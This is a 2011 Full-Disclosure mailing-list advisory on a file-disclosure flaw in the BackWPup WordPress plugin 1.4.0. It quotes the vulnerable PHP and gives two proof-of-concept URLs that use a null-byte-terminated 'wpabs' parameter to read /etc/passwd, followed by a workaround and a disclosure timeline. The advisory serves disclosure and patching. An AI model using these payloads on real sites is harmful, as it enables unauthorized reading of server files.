[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] BackWPup Wordpress plugin <= 1.4.0 File content
From: Danilo Massa <danilo_m () yahoo ! com>
Date: 2011-02-28 15:41:19
Message-ID: 913509.37937.qm () web114218 ! mail ! gq1 ! yahoo ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
=============================================
- Release date: Feb 28th, 2010
- Discovered by: Danilo Massa
- Severity: High
=============================================
I. VULNERABILITY
-------------------------
BackWPup Wordpress plugin <= 1.4.0 File content disclosure
II. BACKGROUND
-------------------------
BackWPup 1.4.0 is a full-featured backup management solution for Wordpress.
The plugin provide:
- Database Backup
- WordPress XML Export
- Optimize Database
- Check\Repair Database
- File Backup
- Backups in zip,tar,tar.gz,tar.bz2 format
- Store backup to Folder
- Store backup to FTP Server
- Store backup to Amazon S3
- Store backup to RackSpaceCloud
- Store backup to DropBox
- Send Log/Backup by eMail
III. INTRODUCTION
-------------------------
BackWPup version 1.4.0 (and may be the previous ones too) has an unfiltered
parameter inside
two php pages that let a remote user to access sensitive files like /etc/passwd.
No authentication required. No plugin activation required.
IV. DESCRIPTION
-------------------------
Input passed via the "wpabs" parameter to the php pages
- wp-content/plugins/backwpup/app/options-view_log-iframe.php
- wp-content/plugins/backwpup/app/options-runnow-iframe.php
is not sanitized before being used.
Both files starts trying to include the wp-load.php file using the wpabs
parameter that can
be inject with a direct call to the page.
options-view_log-iframe.php:
<?PHP
if (file_exists($_GET['wpabs'].'wp-load.php') and file_exists($_GET['logfile']))
{
require_once($_GET['wpabs'].'wp-load.php'); /** Setup WordPress environment */
...
options-runnow-iframe.php:
if (file_exists($_GET['wpabs'].'wp-load.php') and
is_numeric(trim($_GET['jobid']))) {
require_once($_GET['wpabs'].'wp-load.php'); /** Setup WordPress environment */
...
inserting a string terminator %00 inside the wpabs parameter is possible to
specify a file
name instead of a directory and let it being included in the web page.
NOTE: also the
V. PROOF OF CONCEPT
-------------------------
Below is a harmless test that can be executed on a Unix machine that hosts
wordpress with the
vulnerable plugin.
http://<wordpress_site>/wp-content/plugins/backwpup/app/options-runnow-iframe.php?wpabs=/etc/passwd%00&jobid=1
http://<wordpress_site>/wp-content/plugins/backwpup/app/options-view_log-iframe.php?wpabs=/etc/passwd%00&logfile=/etc/passwd
Both of them will display the /etc/passwd file.
VI. BUSINESS IMPACT
-------------------------
An attacker could exploit the vulnerability to retrieve virtually any text file
accessible by the wep application server user.
VII. SYSTEMS AFFECTED
-------------------------
Version 1.4.0 is vulnerable.
Versions <1.4.0 could be vulnerable.
VIII. SOLUTION
-------------------------
Upgrade to a patched release or as quick workaround enclose
any $_GET['wpabs'] in a trim call like this:
if (file_exists(trim($_GET['wpabs']).'wp-load.php') and
file_exists($_GET['logfile'])) {
IX. REFERENCES
-------------------------
http://wordpress.org/extend/plugins/backwpup/
http://danielhuesken.de/portfolio/backwpup/
X. CREDITS
-------------------------
The vulnerability has been discovered by Danilo Massa
danilo(under_score)m(at)yahoo(dot)com
XI. VULNERABILITY HISTORY
-------------------------
January 28th, 2011: Vulnerability identification
January 30th, 2011: Vendor notification
January 30th, 2011: Vendor release an updated version (1.4.1)
February 28th, 2011: Vulnerability disclosure
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this
information.
[Attachment #5 (text/html)]
<html><head><style type="text/css"><!-- DIV {margin:0px;} --></style></head><body><div \
style="font-family:times new roman, new york, times, \
serif;font-size:12pt"><DIV>=============================================<BR>- Release date: Feb \
28th, 2010<BR>- Discovered by: Danilo Massa<BR>- Severity: \
High<BR>=============================================</DIV> <DIV> </DIV>
<DIV>I. VULNERABILITY<BR>-------------------------<BR>BackWPup Wordpress plugin <= 1.4.0 \
File content disclosure</DIV> <DIV> </DIV>
<DIV>II. BACKGROUND<BR>-------------------------<BR>BackWPup 1.4.0 is a full-featured backup \
management solution for Wordpress. <BR>The plugin provide:<BR>- Database Backup<BR>- WordPress \
XML Export<BR>- Optimize Database<BR>- Check\Repair Database<BR>- File Backup<BR>- Backups in \
zip,tar,tar.gz,tar.bz2 format<BR>- Store backup to Folder<BR>- Store backup to FTP Server<BR>- \
Store backup to Amazon S3<BR>- Store backup to RackSpaceCloud<BR>- Store backup to DropBox<BR>- \
Send Log/Backup by eMail<BR> </DIV> <DIV>III. \
INTRODUCTION<BR>-------------------------<BR>BackWPup version 1.4.0 (and may be the previous \
ones too) has an unfiltered parameter inside <BR>two php pages that let a remote user to access \
sensitive files like /etc/passwd.<BR>No authentication required. No plugin activation \
required.</DIV> <DIV> </DIV>
<DIV>IV. DESCRIPTION<BR>-------------------------</DIV>
<DIV>Input passed via the "wpabs" parameter to the php pages<BR>- \
wp-content/plugins/backwpup/app/options-view_log-iframe.php<BR>- \
wp-content/plugins/backwpup/app/options-runnow-iframe.php<BR>is not sanitized before being \
used.</DIV> <DIV><BR>Both files starts trying to include the wp-load.php file using the wpabs \
parameter that can<BR>be inject with a direct call to the page.</DIV> \
<DIV><BR>options-view_log-iframe.php:<BR><?PHP<BR>if \
(file_exists($_GET['wpabs'].'wp-load.php') and file_exists($_GET['logfile'])) \
{<BR> require_once($_GET['wpabs'].'wp-load.php'); /** Setup WordPress environment \
*/<BR>...</DIV> <DIV>options-runnow-iframe.php:<BR>if \
(file_exists($_GET['wpabs'].'wp-load.php') and is_numeric(trim($_GET['jobid']))) \
{<BR> require_once($_GET['wpabs'].'wp-load.php'); /** Setup WordPress environment \
*/<BR>...</DIV> <DIV><BR>inserting a string terminator %00 inside the wpabs parameter is \
possible to specify a file<BR>name instead of a directory and let it being included in the web \
page.</DIV> <DIV>NOTE: also the </DIV>
<DIV><BR>V. PROOF OF CONCEPT<BR>-------------------------</DIV>
<DIV>Below is a harmless test that can be executed on a Unix machine that hosts wordpress with \
the<BR>vulnerable plugin.</DIV> <DIV><A \
href="http://<wordpress_site>/wp-content/plugins/backwpup/app/options-runnow-iframe.php?wpabs=/e \
tc/passwd%00&jobid=1">http://<wordpress_site>/wp-content/plugins/backwpup/app/options-runnow-iframe.php?wpabs=/etc/passwd%00&jobid=1</A></DIV>
<DIV><BR><A href="http://<wordpress_site>/wp-content/plugins/backwpup/app/options-view_log-ifra \
me.php?wpabs=/etc/passwd%00&logfile=/etc/passwd">http://<wordpress_site>/wp-content/pl \
ugins/backwpup/app/options-view_log-iframe.php?wpabs=/etc/passwd%00&logfile=/etc/passwd</A></DIV>
<DIV>Both of them will display the /etc/passwd file.</DIV>
<DIV><BR>VI. BUSINESS IMPACT<BR>-------------------------<BR>An attacker could exploit the \
vulnerability to retrieve virtually any text file <BR>accessible by the wep application server \
user.</DIV> <DIV> </DIV>
<DIV>VII. SYSTEMS AFFECTED<BR>-------------------------<BR>Version 1.4.0 is \
vulnerable.<BR>Versions <1.4.0 could be vulnerable.</DIV> <DIV> </DIV>
<DIV>VIII. SOLUTION<BR>-------------------------<BR>Upgrade to a patched release or as quick \
workaround enclose <BR>any $_GET['wpabs'] in a trim call like this:</DIV> <DIV>if \
(file_exists(trim($_GET['wpabs']).'wp-load.php') and file_exists($_GET['logfile'])) {</DIV> \
<DIV><BR>IX. REFERENCES<BR>-------------------------<BR><A \
href="http://wordpress.org/extend/plugins/backwpup/">http://wordpress.org/extend/plugins/backwpup/</A><BR><A \
href="http://danielhuesken.de/portfolio/backwpup/">http://danielhuesken.de/portfolio/backwpup/</A></DIV>
<DIV> </DIV>
<DIV>X. CREDITS<BR>-------------------------<BR>The vulnerability has been discovered by Danilo \
Massa<BR>danilo(under_score)m(at)yahoo(dot)com</DIV> <DIV> </DIV>
<DIV>XI. VULNERABILITY HISTORY<BR>-------------------------<BR>January 28th, 2011: \
Vulnerability identification<BR>January 30th, 2011: Vendor notification<BR>January 30th, 2011: \
Vendor release an updated version (1.4.1)<BR>February 28th, 2011: Vulnerability \
disclosure</DIV> <DIV>XII. LEGAL NOTICES<BR>-------------------------<BR>The information \
contained within this advisory is supplied "as-is" with<BR>no warranties or guarantees of \
fitness of use or otherwise. I accept no<BR>responsibility for any damage caused by the use or \
misuse of this <BR>information.<BR></DIV></div><br>
</body></html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic